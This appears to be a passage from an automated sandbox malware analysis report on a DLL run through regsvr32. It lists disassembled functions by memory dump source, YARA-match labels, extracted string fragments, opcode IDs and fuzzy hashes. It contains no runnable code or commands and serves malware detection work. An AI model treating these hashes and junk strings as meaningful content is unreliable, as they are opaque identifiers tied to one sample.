                                                                                                                                • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: d~$`5$t>
                                                                                                                                • API String ID: 0-1282322184
                                                                                                                                • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                                                                                • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #St$JYr$hmn
• API String ID: 0-1556749129
• Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
• Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
• Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
• Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
Uniqueness
• Uniqueness Score: -1.00%
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: TGA$K$W}
                                                                                                                                • API String ID: 0-588348707
                                                                                                                                • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                                                                                • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: :1,$@H${C=
                                                                                                                                • API String ID: 0-2737386091
                                                                                                                                • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                                                                                • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: prP$q<C$uL
                                                                                                                                • API String ID: 0-1414207395
                                                                                                                                • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                                                                                • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: :00D$Kl$(R'
                                                                                                                                • API String ID: 0-3661897330
                                                                                                                                • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                                                                                • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 2299586839-1052752507
                                                                                                                                • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                • Instruction ID: 964b9e8d1af1e52c854b3bb8fe8252e49b9a3c928b7092b29c793ac270e5c208
                                                                                                                                • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                • Instruction Fuzzy Hash: A4119172B0868385FB705A64E4913B933D0AB847A8F444031DA8E8B3F5DE2CE5468702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 2299586839-1052752507
                                                                                                                                • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                • Instruction ID: 3dbc7ef3cd3679c604427e4d63d90cad7a1c9e66348bca22563b4959c05d1934
                                                                                                                                • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                • Instruction Fuzzy Hash: 72E06521E0CA8281F630A710E8513AA77D0BF98768F804231D69D466F5DE2CE255CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$Y}
                                                                                                                                • API String ID: 0-941771097
                                                                                                                                • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                                                                                • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 7;}~$?C
                                                                                                                                • API String ID: 0-2633536567
                                                                                                                                • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                                                                                • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 5"*$Wu
                                                                                                                                • API String ID: 0-3407213400
                                                                                                                                • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                                                                                • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: F/|$]M
                                                                                                                                • API String ID: 0-4182351379
                                                                                                                                • Opcode ID: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                                • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                                                                                • Opcode Fuzzy Hash: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                                • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: ;SH$nK
• API String ID: 0-1681473137
• Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
• Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
• Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
• Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,$z
• API String ID: 0-3532108746
• Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
• Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
• Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
• Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: g/?$~l;
• API String ID: 0-1448562259
• Opcode ID: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
• Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
• Opcode Fuzzy Hash: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
• Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: JM$S
• API String ID: 0-422059844
• Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
• Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
• Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
• Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: \4t$sT>
• API String ID: 0-514966222
• Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
• Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
• Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
• Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 6 zT$lh
• API String ID: 0-3667112246
• Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
• Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
• Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
• Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 2Q'$t<p
• API String ID: 0-2959822804
• Opcode ID: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
• Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
• Opcode Fuzzy Hash: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
• Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 95s$\`s
• API String ID: 0-3495284040
• Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
• Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
• Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
• Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 3*$qMu
• API String ID: 0-4093015089
• Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
• Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
• Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
• Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #X$"n&E
• API String ID: 0-1188898577
• Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
• Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
• Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
• Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: Bw~$fy
• API String ID: 0-1663007907
• Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
• Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
• Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
• Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: /0$XyLe
• API String ID: 0-3562702181
• Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
• Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
• Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
• Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: >I$>I
• API String ID: 0-3948471910
• Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
• Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
• Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
• Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: {H2}$}i#c
                                                                                                                                • API String ID: 0-1724349491
                                                                                                                                • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                                                                                • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4V$so
                                                                                                                                • API String ID: 0-1060102820
                                                                                                                                • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                                                                                • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: F+'$O$
                                                                                                                                • API String ID: 0-4064122715
                                                                                                                                • Opcode ID: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                                • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                                                                                • Opcode Fuzzy Hash: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                                • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 1$bO6
                                                                                                                                • API String ID: 0-3242911120
                                                                                                                                • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                                                                                • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )j-J$\rba
                                                                                                                                • API String ID: 0-105394296
                                                                                                                                • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
